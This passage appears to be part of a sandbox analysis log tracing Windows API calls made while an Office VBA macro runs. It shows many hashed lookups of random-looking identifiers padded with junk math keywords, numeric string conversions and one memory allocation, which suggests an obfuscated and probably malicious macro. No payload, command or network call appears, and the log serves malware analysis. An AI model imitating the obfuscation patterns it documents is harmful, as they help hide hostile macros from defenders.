| out: lpWideCharStr=0x0) returned 10 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="418808942") returned 10 [0067.834] VarI4FromStr (in: strIn="418808942", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.834] VarI4FromStr (in: strIn="561518054", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="101005599") returned 10 [0067.834] VarI4FromStr (in: strIn="101005599", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pQAGCcZ") returned 0x1040f4 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="579905676") returned 10 [0067.834] VarI4FromStr (in: strIn="579905676", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rUkDx4AU") returned 0x1062c5 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WAoU11c4") returned 0x10676c [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oUAAAxAQ") returned 0x10d59c [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lcXBxA") returned 0x103ef8 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="728318685") returned 10 [0067.834] VarI4FromStr (in: strIn="728318685", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.834] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lo1A4Q") returned 0x10ee54 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jUDCwCA") returned 0x10311d [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAGQAUAk") returned 0x10898c [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="259575950") returned 10 [0067.835] VarI4FromStr (in: strIn="259575950", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] VarI4FromStr (in: strIn="458835736", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] VarI4FromStr (in: strIn="245603873", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] VarI4FromStr (in: strIn="35532886", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] VarI4FromStr (in: strIn="702559400", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dBAAZAx") returned 0x10e742 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aUD4AZxC") returned 0x10c516 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="797197242") returned 10 [0067.835] VarI4FromStr (in: strIn="797197242", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] VarI4FromStr (in: strIn="32578785", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="m_AAxC") returned 0x108366 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="347691822") returned 10 [0067.835] VarI4FromStr (in: strIn="347691822", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] VarI4FromStr (in: strIn="75403395", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.835] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="865230743") returned 10 [0067.836] VarI4FromStr (in: strIn="865230743", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.836] VarI4FromStr (in: strIn="460944766", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="977085778") returned 10 [0067.836] VarI4FromStr (in: strIn="977085778", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TAAAQADA") returned 0x10cd92 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="999155573") returned 10 [0067.836] VarI4FromStr (in: strIn="999155573", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jABQA1w") returned 0x10a456 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZAxQXUx") returned 0x109b01 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDAGXABU") returned 0x105f91 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="px4GXA") returned 0x10e07a [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.836] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YZAAAoX") returned 0x109943 [0067.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="507063559") returned 10 [0067.837] VarI4FromStr (in: strIn="507063559", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SBo_CAD") returned 0x103624 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bCAocAD") returned 0x10d2e4 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kQAADoA") returned 0x106eea [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.837] VarI4FromStr (in: strIn="925578092", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="822008149", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="516730806", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="465825182", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="905587914", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAA4UADA") returned 0x107ca9 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAAAACZQ") returned 0x108346 [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.837] VarI4FromStr (in: strIn="250631706", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="796307437", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAAcBx4") returned 0x104cc5 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.837] VarI4FromStr (in: strIn="834810612", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="2625017", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.837] VarI4FromStr (in: strIn="465715461", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.837] VarI4FromStr (in: strIn="67792748", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.838] VarI4FromStr (in: strIn="259336783", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wBcAAQAB") returned 0x102e65 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.838] VarI4FromStr (in: strIn="179541610", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="f1oxAAG") returned 0x101c75 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="moBB1A") returned 0x102a1f [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JoQZQUw") returned 0x10bc67 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAABDZA") returned 0x10dabe [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.838] VarI4FromStr (in: strIn="458227027", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kADXADco") returned 0x10ec5d [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lCwAwx4Z") returned 0x107941 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZoAAcUZw") returned 0x10cdc1 [0067.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.838] VarI4FromStr (in: strIn="387857965", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] VarI4FromStr (in: strIn="361082365", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] VarI4FromStr (in: strIn="566211070", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] VarI4FromStr (in: strIn="372056030", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] VarI4FromStr (in: strIn="17802820", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tDGAAQZU") returned 0x100aff [0067.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAAAAAQ_") returned 0x107f9e [0067.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.839] VarI4FromStr (in: strIn="605586761", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] VarI4FromStr (in: strIn="365040135", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nXDBQZ_") returned 0x109758 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.839] VarI4FromStr (in: strIn="174610231", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] VarI4FromStr (in: strIn="344305142", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.839] VarI4FromStr (in: strIn="944734781", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] VarI4FromStr (in: strIn="268980588", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.839] VarI4FromStr (in: strIn="257731656", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wABAcZDG") returned 0x109baf [0067.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.839] VarI4FromStr (in: strIn="755593673", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dA_QAUBA") returned 0x10a991 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jBxxADA") returned 0x10af71 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RZQ4DkD") returned 0x1005cb [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExDACAx") returned 0x104d22 [0067.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.840] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iGBAAkx") returned 0x109d72 [0067.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.840] VarI4FromStr (in: strIn="434827714", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.840] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HAD_4_") returned 0x10e4f0 [0067.840] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kXAQcAUA") returned 0x10bc57 [0067.840] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KDBoAA") returned 0x10ffb2 [0067.840] IMalloc:Realloc (This=0x7fefec05380, pv=0x646e870, cb=0x60) returned 0x694fee0 [0067.840] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b80000 [0067.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.840] VarI4FromStr (in: strIn="363041251", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.840] VarI4FromStr (in: strIn="270121164", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.840] VarI4FromStr (in: strIn="911065777", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.840] VarI4FromStr (in: strIn="95555823", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] VarI4FromStr (in: strIn="558063091", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vDABZcB") returned 0x1036ec [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HAAowoGA") returned 0x10f793 [0067.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.841] VarI4FromStr (in: strIn="542381129", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] VarI4FromStr (in: strIn="482848670", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAAAUADA") returned 0x10ef32 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.841] VarI4FromStr (in: strIn="560430856", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] VarI4FromStr (in: strIn="723229838", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.841] VarI4FromStr (in: strIn="312563367", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] VarI4FromStr (in: strIn="298079992", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.841] VarI4FromStr (in: strIn="622186146", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rAX_XUA") returned 0x107bc6 [0067.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.841] VarI4FromStr (in: strIn="939995262", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAZ4ABD") returned 0x10ef22 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAkUABCD") returned 0x10c76a [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TZQAAx") returned 0x10a03b [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oXcQCw") returned 0x109149 [0067.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.841] VarI4FromStr (in: strIn="185717924", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAcwAxc4") returned 0x101375 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qXcUAUAX") returned 0x1011d6 [0067.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sU1AAUAC") returned 0x104d81 [0067.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.842] VarI4FromStr (in: strIn="93774671", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] VarI4FromStr (in: strIn="380968694", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] VarI4FromStr (in: strIn="882741528", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.842] VarI4FromStr (in: strIn="516318656", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 